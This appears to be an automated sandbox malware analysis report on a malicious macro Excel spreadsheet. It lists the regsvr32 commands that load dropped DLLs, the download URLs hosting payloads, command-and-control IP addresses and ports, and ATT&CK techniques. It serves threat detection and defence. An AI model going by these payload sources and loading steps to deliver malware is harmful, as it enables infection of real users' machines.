Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmpBinary or memory string: !Progman
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting32Path InterceptionProcess Injection112Masquerading11OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer14Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting32NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol24Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 342170 Sample: printouts of outstanding as... Startdate: 20/01/2021 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Antivirus detection for URL or domain 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 8 other signatures 2->62 7 EXCEL.EXE 244 70 2->7         started        process3 dnsIp4 42 bafnabrotherskesarwala.com 103.11.153.223, 49166, 80 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 7->42 44 salaodigitalautomovel.pt.deve.pt 185.32.190.115, 49181, 80 PTSERVIDORPT Portugal 7->44 46 6 other IPs or domains 7->46 34 C:\Users\user\AppData\Local\...\zsijkwsd.dll, PE32 7->34 dropped 36 C:\Users\user\AppData\Local\...\zlgzuxvz.dll, PE32 7->36 dropped 38 C:\Users\user\AppData\Local\Temp\ogsit.dll, PE32 7->38 dropped 40 5 other malicious files 7->40 dropped 66 Document exploit detected (creates forbidden files) 7->66 68 Document exploit detected (process start blacklist hit) 7->68 70 Document exploit detected (UrlDownloadToFile) 7->70 12 regsvr32.exe 7->12         started        14 regsvr32.exe 7->14         started        16 regsvr32.exe 7->16         started        18 11 other processes 7->18 file5 signatures6 process7 process8 20 regsvr32.exe 12->20         started        23 regsvr32.exe 9 14->23         started        26 regsvr32.exe 11 16->26         started        28 regsvr32.exe 9 18->28         started        30 regsvr32.exe 9 18->30         started        32 regsvr32.exe 18->32         started        dnsIp9 64 System process connects to network (likely due to code injection or exploit) 20->64 48 194.225.58.214, 443, 49170, 49171 TUMS-IR-ASIR Iran (ISLAMIC Republic Of) 23->48 50 198.57.200.100, 3786, 49177, 49180 UNIFIEDLAYER-AS-1US United States 26->50 52 211.110.44.63, 49173, 49174, 49182 SKB-ASSKBroadbandCoLtdKR Korea Republic of 26->52 54 69.164.207.140, 3388, 49175, 49178 LINODE-APLinodeLLCUS United States 26->54 signatures10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
printouts of outstanding as of 01_20_2021.xlsm25%VirustotalBrowse
printouts of outstanding as of 01_20_2021.xlsm11%ReversingLabsScript-Macro.Trojan.Logan

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip4%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip4%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar4%ReversingLabs
C:\Users\user\AppData\Local\Temp\ogsit.dll4%ReversingLabs
C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll4%ReversingLabs
C:\Users\user\AppData\Local\Temp\zsijkwsd.dll4%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://198.57.200.100:3786/hy;R0%Avira URL Cloudsafe
https://211.110.44.63:5353/0%Avira URL Cloudsafe
https://69.164.207.140/0%Avira URL Cloudsafe
https://194.225.58.214/50%Avira URL Cloudsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
https://194.225.58.214/0%Avira URL Cloudsafe
https://211.110.44.63/~0%Avira URL Cloudsafe
https://194.225.58.214/90%Avira URL Cloudsafe
http://laureys.be/cgi-sys/suspendedpage.cgi0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
https://69.164.207.140:3388/hy0%Avira URL Cloudsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://cms.ivpr.org/by9zwa7p1.zip100%Avira URL Cloudmalware
https://69.164.207.140/q0%Avira URL Cloudsafe
https://69.164.207.140:3388/0%Avira URL Cloudsafe
http://bafnabrotherskesarwala.com/ys95lm6k.rar0%Avira URL Cloudsafe
https://198.57.200.100:3786/0%Avira URL Cloudsafe
https://211.110.44.63/h0%Avira URL Cloudsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
https://198.57.200.100/0%Avira URL Cloudsafe
http://monitrade.net/h79fwesfe.rar100%Avira URL Cloudmalware
https://211.110.44.63/0%Avira URL Cloudsafe
http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.zip100%Avira URL Cloudmalware
http://www.gastronauts.asia/ylztwx.rar0%Avira URL Cloudsafe
http://laureys.be/uzssv27.rar100%Avira URL Cloudmalware
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://artec.com.tr/xkpffwn.zip100%Avira URL Cloudmalware
http://servername/isapibackend.dll0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bafnabrotherskesarwala.com
103.11.153.223
truefalse
    		unknown
    salaodigitalautomovel.pt.deve.pt
    		185.32.190.115
    		truefalse
      		unknown
      monitrade.net
      		192.185.147.185
      		truefalse
        		unknown
        laureys.be
        		85.17.252.207
        		truefalse
          		unknown
          artec.com.tr
          		46.28.239.13
          		truefalse
            		unknown
            cms.ivpr.org
            		64.37.52.138
            		truefalse
              		unknown
              gastronauts.asia
              		132.148.96.144
              		truefalse
                		unknown
                www.gastronauts.asia
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://laureys.be/cgi-sys/suspendedpage.cgifalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://cms.ivpr.org/by9zwa7p1.ziptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://bafnabrotherskesarwala.com/ys95lm6k.rarfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://monitrade.net/h79fwesfe.rartrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://salaodigitalautomovel.pt.deve.pt/d8ms3mljy.ziptrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://www.gastronauts.asia/ylztwx.rarfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://laureys.be/uzssv27.rartrue
                  • Avira URL Cloud: malware
                  		unknown
                  http://artec.com.tr/xkpffwn.ziptrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://198.57.200.100:3786/hy;Rregsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://211.110.44.63:5353/regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://69.164.207.140/regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.entrust.net/server1.crl0regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    		high
                    https://194.225.58.214/5regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net03regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://194.225.58.214/regsvr32.exe, 00000006.00000002.2400015842.00000000003F9000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://211.110.44.63/~regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://194.225.58.214/9regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://69.164.207.140:3388/hyregsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://69.164.207.140/qregsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://69.164.207.140:3388/regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://198.57.200.100:3786/regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://211.110.44.63/hregsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://198.57.200.100/regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://211.110.44.63/regsvr32.exe, 00000006.00000002.2410021140.000000000047D000.00000004.00000020.sdmp, regsvr32.exe, 0000000E.00000002.2405408190.0000000000590000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net0Dregsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://secure.comodo.com/CPS0regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                      		high
                      http://servername/isapibackend.dllregsvr32.exe, 00000002.00000002.2107200716.0000000001D70000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2406809963.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2112116772.0000000001D50000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2419749632.0000000000880000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2113665422.0000000001D90000.00000002.00000001.sdmp, regsvr32.exe, 00000008.00000002.2120190682.0000000001D30000.00000002.00000001.sdmp, regsvr32.exe, 00000009.00000002.2114236047.0000000001D60000.00000002.00000001.sdmp, regsvr32.exe, 0000000A.00000002.2124921151.0000000001DF0000.00000002.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000006.00000002.2400185744.0000000000451000.00000004.00000020.sdmp, regsvr32.exe, 0000000C.00000003.2294632525.00000000003E8000.00000004.00000001.sdmpfalse
                        		high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        185.32.190.115
                        		unknownPortugal
                        		62416PTSERVIDORPTfalse
                        85.17.252.207
                        		unknownNetherlands
                        		60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                        103.11.153.223
                        		unknownIndia
                        		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINfalse
                        46.28.239.13
                        		unknownTurkey
                        		42910PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTRfalse
                        198.57.200.100
                        		unknownUnited States
                        		46606UNIFIEDLAYER-AS-1UStrue
                        69.164.207.140
                        		unknownUnited States
                        		63949LINODE-APLinodeLLCUStrue
                        211.110.44.63
                        		unknownKorea Republic of
                        		9318SKB-ASSKBroadbandCoLtdKRtrue
                        192.185.147.185
                        		unknownUnited States
                        		26337OIS1USfalse
                        132.148.96.144
                        		unknownUnited States
                        		398101GO-DADDY-COM-LLCUSfalse
                        64.37.52.138
                        		unknownUnited States
                        		33182DIMENOCUSfalse
                        194.225.58.214
                        		unknownIran (ISLAMIC Republic Of)
                        		43965TUMS-IR-ASIRtrue

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:342170
                        Start date:20.01.2021
                        Start time:16:12:12
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 10m 31s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:printouts of outstanding as of 01_20_2021.xlsm
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.expl.evad.winXLSM@41/22@7/11
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xlsm
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 93.184.221.240, 2.20.142.209, 2.20.142.210
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net
                        • Execution Graph export aborted for target regsvr32.exe, PID 1428 because there are no executed function
                        • Execution Graph export aborted for target regsvr32.exe, PID 2372 because there are no executed function
                        • Execution Graph export aborted for target regsvr32.exe, PID 2424 because there are no executed function
                        • Execution Graph export aborted for target regsvr32.exe, PID 2848 because there are no executed function
                        • Execution Graph export aborted for target regsvr32.exe, PID 856 because there are no executed function
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        16:13:56API Interceptor1750x Sleep call for process: regsvr32.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        69.164.207.140Statement of Account as of 01_20_2021.xlsmGet hashmaliciousBrowse
                          sample20210120-01.xlsmGet hashmaliciousBrowse
                            by9zwa7p1zip.dllGet hashmaliciousBrowse
                              Information_265667970.docGet hashmaliciousBrowse
                                Order-565822389.docGet hashmaliciousBrowse
                                  Documentation-435217538.docGet hashmaliciousBrowse
                                    ghen5nlzip.dllGet hashmaliciousBrowse
                                      vgw2ufi.jpg.dllGet hashmaliciousBrowse
                                        Invoice_11_11_2020.xlsmGet hashmaliciousBrowse
                                          Invoice_12-11-2020.xlsGet hashmaliciousBrowse
                                            q7ad0mzkgif.dllGet hashmaliciousBrowse
                                              Sales_Invoice_873878_071601_from_Inc.xlsmGet hashmaliciousBrowse
                                                Invoice_334654_168522_from_Inc.xlsmGet hashmaliciousBrowse
                                                  Invoice_403372_917428_from_Inc.xlsmGet hashmaliciousBrowse
                                                    185.32.190.115Statement of Account as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                    • carzone.deve.pt/s3zpciz99.rar
                                                    85.17.252.207sample20210120-01.xlsmGet hashmaliciousBrowse
                                                    • laureys.be/uzssv27.rar
                                                    46.28.239.13sample20210120-01.xlsmGet hashmaliciousBrowse
                                                    • artec.com.tr/xkpffwn.zip
                                                    198.57.200.100Statement of Account as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                      sample20210120-01.xlsmGet hashmaliciousBrowse
                                                        by9zwa7p1zip.dllGet hashmaliciousBrowse
                                                          Amazon_eGift-Card.451219634.docGet hashmaliciousBrowse
                                                            Order_Gift_Card.961396645.docGet hashmaliciousBrowse
                                                              eGift-CardAmazon.907427310.docGet hashmaliciousBrowse
                                                                Gift_Card_209788849.docGet hashmaliciousBrowse
                                                                  Order_Gift_Card_411022863.docGet hashmaliciousBrowse
                                                                    Amazon_Gift-Card.579177920.exeGet hashmaliciousBrowse
                                                                      Amazon_eGift-Card_579366314.exeGet hashmaliciousBrowse
                                                                        pzxrk4325.dllGet hashmaliciousBrowse
                                                                          Gift_Card-.exeGet hashmaliciousBrowse
                                                                            nsetldk.dllGet hashmaliciousBrowse
                                                                              Gift_Card-20513935.exeGet hashmaliciousBrowse

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                artec.com.trsample20210120-01.xlsmGet hashmaliciousBrowse
                                                                                • 46.28.239.13
                                                                                monitrade.netsample20210120-01.xlsmGet hashmaliciousBrowse
                                                                                • 192.185.147.185
                                                                                laureys.besample20210120-01.xlsmGet hashmaliciousBrowse
                                                                                • 85.17.252.207

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                LEASEWEB-NL-AMS-01NetherlandsNLsample20210120-01.xlsmGet hashmaliciousBrowse
                                                                                • 85.17.252.207
                                                                                VCS58GQMhuCYghC.exeGet hashmaliciousBrowse
                                                                                • 5.79.70.98
                                                                                FHT210995.exeGet hashmaliciousBrowse
                                                                                • 37.48.65.150
                                                                                Statement for T10495.jarGet hashmaliciousBrowse
                                                                                • 212.32.237.90
                                                                                CQcT4Ph03Z.exeGet hashmaliciousBrowse
                                                                                • 37.48.65.150
                                                                                Y75vU558UfuGbzM.exeGet hashmaliciousBrowse
                                                                                • 5.79.70.98
                                                                                SHEXD2101127S_ShippingDocument_DkD.xlsxGet hashmaliciousBrowse
                                                                                • 37.48.65.148
                                                                                tcwO1bua5E.exeGet hashmaliciousBrowse
                                                                                • 5.79.72.163
                                                                                87e8ff5c51e0.xlsGet hashmaliciousBrowse
                                                                                • 5.79.72.163
                                                                                equinix-customer-portal.apkGet hashmaliciousBrowse
                                                                                • 37.48.77.161
                                                                                z9TZyyfUsq.exeGet hashmaliciousBrowse
                                                                                • 37.48.65.150
                                                                                YvGnm93rap.exeGet hashmaliciousBrowse
                                                                                • 37.48.65.150
                                                                                5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                                • 37.48.65.149
                                                                                anydesk (1).exeGet hashmaliciousBrowse
                                                                                • 178.162.151.213
                                                                                T0pH7Bimeq.exeGet hashmaliciousBrowse
                                                                                • 37.48.65.151
                                                                                c6Rg7xug26.exeGet hashmaliciousBrowse
                                                                                • 212.32.237.101
                                                                                parler.apkGet hashmaliciousBrowse
                                                                                • 37.48.77.180
                                                                                parler.apkGet hashmaliciousBrowse
                                                                                • 37.48.77.162
                                                                                Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtfGet hashmaliciousBrowse
                                                                                • 5.79.72.163
                                                                                http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                                                • 178.162.133.149
                                                                                PTSERVIDORPTStatement of Account as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                                                • 185.32.190.115
                                                                                EAvDkVMy22.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                cUv4fniDWj.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                UAM4Ec26io.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                WtmfKeL3bS.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                20OetOSFOv.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                rJ6LBcOAZ7.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                p0MPFx4N7y.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                ps5ZCs1aiT.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                b0YjMtDv32.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                PsE3ZwU4Yh.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                KJHzM29Bgx.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                kck5b6zy6e.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                Xe0OLFzjRy.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                iQbpPSLytp.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                pxVglLqCsa.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                ai76sn4zOU.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                jWyAXi88gm.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                dWMVGY2xXo.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                R1RiBRChvm.docGet hashmaliciousBrowse
                                                                                • 185.32.188.19
                                                                                WEBWERKS-AS-INWebWerksIndiaPvtLtdINpayment infirmation.exeGet hashmaliciousBrowse
                                                                                • 206.183.111.188
                                                                                User Credentials.docGet hashmaliciousBrowse
                                                                                • 103.212.121.59
                                                                                E-Statement.exeGet hashmaliciousBrowse
                                                                                • 103.212.121.190
                                                                                CV_SrinivasaBabuAdhikari.pdf.exeGet hashmaliciousBrowse
                                                                                • 103.212.121.190
                                                                                STS CARGO SHIPMENT.exeGet hashmaliciousBrowse
                                                                                • 103.212.121.190
                                                                                HSBC Payment Advice.exeGet hashmaliciousBrowse
                                                                                • 103.212.121.190
                                                                                990109.exeGet hashmaliciousBrowse
                                                                                • 150.242.140.16
                                                                                https://upinsmokebatonrouge.com/var/kZKk4S0XnGUwc0OKsia1/Get hashmaliciousBrowse
                                                                                • 103.86.176.8
                                                                                Document-63665398-12152020.xlsGet hashmaliciousBrowse
                                                                                • 43.240.64.184
                                                                                Za1rZVzIOp.xlsGet hashmaliciousBrowse
                                                                                • 103.251.24.140
                                                                                document-837747519.xlsGet hashmaliciousBrowse
                                                                                • 43.241.71.20
                                                                                document-837747519.xlsGet hashmaliciousBrowse
                                                                                • 43.241.71.20
                                                                                SecuriteInfo.com.Trojan.Packed2.41837.21003.exeGet hashmaliciousBrowse
                                                                                • 150.242.14.61
                                                                                Smpp Route.exeGet hashmaliciousBrowse
                                                                                • 150.242.14.61
                                                                                Inv.exeGet hashmaliciousBrowse
                                                                                • 103.119.239.28
                                                                                http://technoraga.com/Doc.htmGet hashmaliciousBrowse
                                                                                • 103.212.121.61
                                                                                z865yM9Ehy.exeGet hashmaliciousBrowse
                                                                                • 150.242.14.61
                                                                                kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                                • 150.242.140.16
                                                                                intelgraphics.exeGet hashmaliciousBrowse
                                                                                • 150.242.14.61
                                                                                Quotation.exeGet hashmaliciousBrowse
                                                                                • 103.86.177.235

                                                                                JA3 Fingerprints

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                eb88d0b3e1961a0562f006e5ce2a0b87Statement of Account as of 01_20_2021.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                sample20210120-01.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                sample20210113-01.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                INV8222874744_20210111490395.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                Inv0209966048-20210111075675.xlsGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                INV2680371456-20210111889374.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                INV8073565781-20210111319595.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                INV9698791470-20210111920647.xlsmGet hashmaliciousBrowse
                                                                                • 194.225.58.214
                                                                                INV7693947099-20210111388211.xlsmGet hashmaliciousBrowse
